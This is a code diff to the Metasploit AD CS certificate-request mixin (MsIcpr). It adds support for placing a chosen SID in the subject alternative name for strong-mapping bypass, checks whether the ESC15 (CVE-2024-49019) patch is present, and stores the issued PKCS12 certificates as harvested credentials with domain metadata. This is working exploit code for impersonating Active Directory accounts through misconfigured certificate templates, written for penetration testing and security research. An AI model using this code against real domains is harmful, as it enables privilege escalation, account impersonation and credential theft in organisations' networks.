@@ -6,6 +6,7 @@
 # -*- coding: binary -*-
 
 require 'windows_error'
+require 'windows_error/h_result'
 require 'rex/proto/x509/request'
 
 module Msf
@@ -26,9 +27,13 @@ module Exploit::Remote::MsIcpr
   # [[MS-WCCE]: 2.2.2.7.7.3 Encoding a Certificate Application Policy Extension](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wcce/160b96b1-c431-457a-8eed-27c11873f378)
   OID_APPLICATION_CERT_POLICIES = '1.3.6.1.4.1.311.21.10'.freeze
 
+  # [[SAN URL prefix for strong SID mapping for KDCs running Windows Server Preview Build 25246 and later](https://techcommunity.microsoft.com/blog/askds/preview-of-san-uri-for-certificate-strong-mapping-for-kb5014754/3789785)]
+  SAN_URL_PREFIX = "tag:microsoft.com,2022-09-14:sid:"
+
   class MsIcprError < StandardError; end
   class MsIcprConnectionError < MsIcprError; end
   class MsIcprAuthenticationError < MsIcprError; end
+  class MsIcprAuthorizationError < MsIcprError; end
   class MsIcprNotFoundError < MsIcprError; end
   class MsIcprUnexpectedReplyError < MsIcprError; end
   class MsIcprUnknownError < MsIcprError; end
@@ -90,7 +95,7 @@ module Exploit::Remote::MsIcpr
     rescue RubySMB::Error::UnexpectedStatusCode => e
       if e.status_code == ::WindowsError::NTStatus::STATUS_OBJECT_NAME_NOT_FOUND
         # STATUS_OBJECT_NAME_NOT_FOUND will be the status if Active Directory Certificate Service (AD CS) is not installed on the target
-        raise MsIcprNotFoundError, 'Connection failed (AD CS was not found)'
+        raise MsIcprNotFoundError, 'Connection failed (AD CS was not found).'
       end
 
       elog(e.message, error: e)
@@ -168,6 +173,12 @@ module Exploit::Remote::MsIcpr
     san = []
     san << "dns=#{alt_dns}" if alt_dns
     san << "upn=#{alt_upn}" if alt_upn
+
+    if alt_sid
+      san << "url=#{SAN_URL_PREFIX}#{alt_sid}"
+      san << "url=#{alt_sid}"
+    end
+
     attributes['SAN'] = san.join('&') unless san.empty?
 
     vprint_status(status_msg)
@@ -191,10 +202,34 @@ module Exploit::Remote::MsIcpr
         print_error("  Source:  #{hresult.facility}") if hresult.facility
         print_error("  HRESULT: #{hresult}")
       end
+
+      case hresult
+      when ::WindowsError::HResult::CERTSRV_E_ENROLL_DENIED
+        raise MsIcprAuthorizationError.new(hresult.description)
+      when ::WindowsError::HResult::CERTSRV_E_TEMPLATE_DENIED
+        raise MsIcprAuthorizationError.new(hresult.description)
+      when ::WindowsError::HResult::CERTSRV_E_UNSUPPORTED_CERT_TYPE
+        raise MsIcprNotFoundError.new(hresult.description)
+      else
+        raise MsIcprUnknownError.new(hresult.description)
+      end
     end
 
     return unless response[:certificate]
 
+    policy_oids = get_cert_policy_oids(response[:certificate])
+    if application_policies.present? && !(application_policies - policy_oids.map(&:value)).empty?
+      print_error('Certificate application policy OIDs were submitted, but some are missing in the response. This indicates the target has received the patch for ESC15 (CVE-2024-49019) or the template is not vulnerable.')
+      return
+    end
+
+    if policy_oids
+      print_status('Certificate Policies:')
+      policy_oids.each do |oid|
+        print_status("  * #{oid.value}" + (oid.label.present? ? " (#{oid.label})" : ''))
+      end
+    end
+
     unless (dns = get_cert_san_dns(response[:certificate])).empty?
       print_status("Certificate DNS: #{dns.join(', ')}")
     end
@@ -211,16 +246,16 @@ module Exploit::Remote::MsIcpr
       print_status("Certificate UPN: #{upn.join(', ')}")
     end
 
-    unless (policy_oids = get_cert_policy_oids(response[:certificate])).empty?
-      print_status("Certificate Policies:")
-      policy_oids.each do |oid|
-        print_status("  * #{oid.value}" + (oid.label.present? ? " (#{oid.label})" : ''))
-      end
+    unless (uri = get_cert_san_uri(response[:certificate])).empty?
+      print_status("Certificate URI: #{uri.join(', ')}")
     end
 
     pkcs12 = OpenSSL::PKCS12.create('', '', private_key, response[:certificate])
     # see: https://pki-tutorial.readthedocs.io/en/latest/mime.html#mime-types
     info = "#{simple.client.default_domain}\\#{datastore['SMBUser']} Certificate"
+    # TODO: I was under the impression a single certificate can only have one UPN associated with it.
+    #       But here, `upn` can be an array of UPN's. This will need to be sorted out.
+    upn_username, upn_domain = upn&.first&.split('@')
 
     service_data = icpr_service_data
     credential_data = {
@@ -230,10 +265,12 @@ module Exploit::Remote::MsIcpr
       protocol: service_data[:proto],
       service_name: service_data[:name],
       workspace_id: myworkspace_id,
-      username: upn || datastore['SMBUser'],
+      username: upn_username || datastore['SMBUser'],
       private_type: :pkcs12,
-      # pkcs12 is a binary format, but for persisting we Base64 encode it
       private_data: Base64.strict_encode64(pkcs12.to_der),
+      private_metadata: { adcs_ca: datastore['CA'], adcs_template: cert_template },
+      realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+      realm_value: upn_domain || simple.client.default_domain,
       origin_type: :service,
       module_fullname: fullname
     }
@@ -260,10 +297,25 @@ module Exploit::Remote::MsIcpr
       extensions = []
 
       subject_alt_names = []
-      subject_alt_names << "DNS:#{dns}" if dns
-      subject_alt_names << "otherName:#{OID_NT_PRINCIPAL_NAME};UTF8:#{msext_upn}" if msext_upn
+      subject_alt_names << "otherName = #{OID_NT_PRINCIPAL_NAME};UTF8:#{msext_upn}" if msext_upn
+
+      if msext_sid
+        subject_alt_names << "URI = #{SAN_URL_PREFIX}#{msext_sid}"
+        subject_alt_names << "URI = #{msext_sid}"
+      end
+
+      subject_alt_names << "DNS = #{dns}" if dns
+      
       unless subject_alt_names.empty?
-        extensions << OpenSSL::X509::ExtensionFactory.new.create_extension('subjectAltName', subject_alt_names.join(','), false)
+        # factory.create_extension accepts a comma separated list of SANs or a config file of SANs.
+        # SAN_URL_PREFIX in the URI SAN contains a comma so we create a config file and add it to the factory
+        # The config file requires an identifier we define at the top of the file [alt_names]
+        subject_alt_names.prepend("[alt_names]")
+        subject_alt_names_conf = subject_alt_names.join("\n")
+        config = OpenSSL::Config.parse(subject_alt_names_conf)
+        factory = OpenSSL::X509::ExtensionFactory.new
+        factory.config = config
+        extensions << factory.create_extension('subjectAltName', '@alt_names', false)
       end
 
       if msext_sid
@@ -299,7 +351,7 @@ module Exploit::Remote::MsIcpr
   # @param [OpenSSL::X509::Certificate] cert The public key to use for signing the request.
   # @param [OpenSSL::PKey::RSA] key The private key to use for signing the request.
   # @param [String] algorithm The digest algorithm to use.
-  # @return [Rex::Proto::Kerberos::Model::Pkinit::ContentInfo] The signed request content.
+  # @return [Rex::Proto::CryptoAsn1::Cms::ContentInfo] The signed request content.
   def build_on_behalf_of(csr:, on_behalf_of:, cert:, key:, algorithm: 'SHA256')
     # algorithm needs to be one that OpenSSL supports, but we also need the OID constants defined
     digest = OpenSSL::Digest.new(algorithm)
@@ -309,7 +361,7 @@ module Exploit::Remote::MsIcpr
 
     digest_oid = Rex::Proto::Kerberos::Model::OID.const_get(digest.name)
 
-    signer_info = Rex::Proto::Kerberos::Model::Pkinit::SignerInfo.new(
+    signer_info = Rex::Proto::CryptoAsn1::Cms::SignerInfo.new(
       version: 1,
       sid: {
         issuer: cert.issuer,
@@ -342,7 +394,7 @@ module Exploit::Remote::MsIcpr
 
     signer_info[:signature] = signature
 
-    signed_data = Rex::Proto::Kerberos::Model::Pkinit::SignedData.new(
+    signed_data = Rex::Proto::CryptoAsn1::Cms::SignedData.new(
       version: 3,
       digest_algorithms: [
         {
@@ -357,9 +409,9 @@ module Exploit::Remote::MsIcpr
       signer_infos: [signer_info]
     )
 
-    Rex::Proto::Kerberos::Model::Pkinit::ContentInfo.new(
+    Rex::Proto::CryptoAsn1::Cms::ContentInfo.new(
       content_type: Rex::Proto::Kerberos::Model::OID::SignedData,
-      signed_data: signed_data
+      data: signed_data
     )
   end
 
@@ -446,6 +498,20 @@ module Exploit::Remote::MsIcpr
     end
   end
 
+  # Get the URI/URL from the certificate.
+  #
+  # @param [OpenSSL::X509::Certificate] cert
+  # @return [Array<String>] The URIs/URLs if any were found.
+  def get_cert_san_uri(cert)
+    return [] unless (san = get_cert_san(cert))
+
+    san[:GeneralNames].value.select do |gn|
+      gn[:uniformResourceIdentifier].value?
+    end.map do |gn|
+      gn[:uniformResourceIdentifier].value
+    end
+  end
+
   def icpr_service_data
     {
       host: rhost,
